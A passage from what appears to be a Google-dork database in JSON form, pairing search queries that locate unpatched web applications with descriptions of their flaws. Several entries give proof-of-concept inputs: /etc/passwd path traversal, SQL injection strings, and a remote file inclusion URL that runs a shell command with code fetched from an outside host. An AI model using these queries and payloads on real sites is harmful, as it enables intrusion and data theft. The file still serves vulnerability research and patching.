VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers."}, {"dork": "\"Powered by: vBulletin * 3.0.1\" inurl:newreply.php", "description": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/."}, {"dork": "\"Powered by Invision Power Board(U) v1.3 Final\"", "description": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/"}, {"dork": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "description": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/"}, {"dork": "inurl:gotoURL.asp?url=", "description": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement."}, {"dork": "\"powered by antiboard\"", "description": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future."}, {"dork": "inurl:comersus_message.asp", "description": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable."}, {"dork": "ext:pl inurl:cgi intitle:\"FormMail *\" -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "description": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/"}, {"dork": "inurl:\"dispatch.php?atknodetype\" | inurl:class.at", "description": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html"}, {"dork": "\"Powered by Gallery v1.4.4\"", "description": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \""}, {"dork": "\"Powered by Ikonboard 3.1.1\"", "description": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2."}, {"dork": "inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca", "description": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability."}, {"dork": "inurl:\"/becommunity/community/index.php?pageurl=\"", "description": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta"}, {"dork": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "description": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/"}, {"dork": "\"Powered by DCP-Portal v5.5\"", "description": "DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "\"FC Bigfeet\" -inurl:mail", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities."}, {"dork": "filetype:cgi inurl:tseekdir.cgi", "description": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html"}, {"dork": "filetype:cgi inurl:pdesk.cgi", "description": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html"}, {"dork": "\"Powered by IceWarp Software\" inurl:mail", "description": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920"}, {"dork": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "description": "The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above."}, {"dork": "inurl:com_remository", "description": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&Itemid= Renegade added : \".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box..."}, {"dork": "inurl:\"comment.php?serendipity\"", "description": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/"}, {"dork": "\"Powered by AJ-Fork v.167\"", "description": "AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. It is vulnerable for a full path disclosure. http://www.securityfocus.com/bid/11301"}, {"dork": "\"Powered by Megabook *\" inurl:guestbook.cgi", "description": "MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065"}, {"dork": "\"Powered by yappa-ng\"", "description": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314"}, {"dork": "\"Active Webcam Page\" inurl:8080", "description": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting"}, {"dork": "\"Powered by A-CART\"", "description": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). http://www.securityfocus.com/bid/5597 (search SF for more)"}, {"dork": "\"Online Store - Powered by ProductCart\"", "description": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)"}, {"dork": "\"Powered by FUDforum\"", "description": "FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems. http://www.securityfocus.com/bid/5501"}, {"dork": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "description": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.\" There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection."}, {"dork": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "description": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems: * EMU Webmail version 5.0 * EMU Webmail version 5.1.0 Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861"}, {"dork": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "description": "WebJeff-Filemanager 1.x DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files. The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995"}, {"dork": "inurl:\"messageboard/Forum.asp?\"", "description": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361"}, {"dork": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "description": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript."}, {"dork": "\"2003 DUware All Rights Reserved\"", "description": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. DUclassmate may allow unauthorized remote attackers to gain access to a computer. DUclassified is reported prone to multiple SQL injection vulnerabilities. SQL injection issues also affect DUforum. DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities."}, {"dork": "\"This page has been automatically generated by Plesk Server Administrator\"", "description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP. Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code. This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username. http://www.securityfocus.com/bid/3737"}, {"dork": "inurl:ttt-webmaster.php", "description": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php"}, {"dork": "\"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002 Agustin Dondo Scripts\"", "description": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617"}, {"dork": "\"Powered by CubeCart\"", "description": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt"}, {"dork": "\"Ideal BB Version: 0.1\" -idealbb.com", "description": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB."}, {"dork": "\"Powered by YaPig V0.92b\"", "description": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452"}, {"dork": "inurl:\"/site/articles.asp?idcategory=\"", "description": "Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509"}, {"dork": "filetype:cgi inurl:nbmember.cgi", "description": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504"}, {"dork": "\"Powered by Coppermine Photo Gallery\"", "description": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485"}, {"dork": "\"Powered by WowBB\" -site:wowbb.com", "description": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/"}, {"dork": "\"Powered by ocPortal\" -demo -ocportal.com", "description": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368"}, {"dork": "inurl:\"slxweb.dll\"", "description": "salesLogix is the Customer Relationship Management solution thatdrives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the server into authenticating a remote user as the CRM administrator without requiring a password. It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450"}, {"dork": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "description": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation."}, {"dork": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "description": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325"}, {"dork": "inurl:wiki/MediaWiki", "description": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7"}, {"dork": "\"inurl:/site/articles.asp?idcategory=\"", "description": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:"}, {"dork": "\"Enter ip\" inurl:\"php-ping.php\"", "description": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg"}, {"dork": "intitle:welcome.to.horde", "description": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus."}, {"dork": "\"BlackBoard 1.5.1-f | \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-4 by Yves Goergen\"", "description": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well."}, {"dork": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "description": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193"}, {"dork": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "description": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631"}, {"dork": "\"driven by: ASP Message Board\"", "description": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out."}, {"dork": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "description": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654"}, {"dork": "inurl:directorypro.cgi", "description": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793"}, {"dork": "inurl:cal_make.pl", "description": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663"}, {"dork": "\"Powered by PowerPortal v1.3\"", "description": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681"}, {"dork": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "description": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688"}, {"dork": "intitle:\"View Img\" inurl:viewimg.php", "description": "It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information."}, {"dork": "+\"Powered by Invision Power Board v2.0.0..2\"", "description": "A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719"}, {"dork": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "description": "phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal."}, {"dork": "ext:php intext:\"Powered by phpNewMan Version\"", "description": "PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. path/to/news/browse.php?clang=../../../../../../file/i/want"}, {"dork": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "description": "Query: \"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/"}, {"dork": "intext:Generated.by.phpix.1.0? inurl:$mode=album", "description": "Product: PHPix Version: 1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html"}, {"dork": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "description": "Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to \"published\" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. As reported on Securiteam.com:http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is inlcluded in the advisory."}, {"dork": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "description": "date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On."}, {"dork": "\"IceWarp Web Mail 5.3.0\" \"Powered by IceWarp\"", "description": "IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/"}, {"dork": "\"Powered by MercuryBoard [v1\"", "description": "Exploit for MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:\"Powered by MercuryBoard [v1\"And the exploit does work!"}, {"dork": "\"delete entries\" inurl:admin/delete.asp", "description": "As described in OSVDB article #13715:\"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.\"The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork."}, {"dork": "allintitle:aspjar.com guestbook", "description": "\"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:\"' or ''='I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)"}, {"dork": "\"powered by CubeCart 2.0\"", "description": "This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/"}, {"dork": "Powered.by:.vBulletin.Version ...3.0.6", "description": "vBulletin is reported 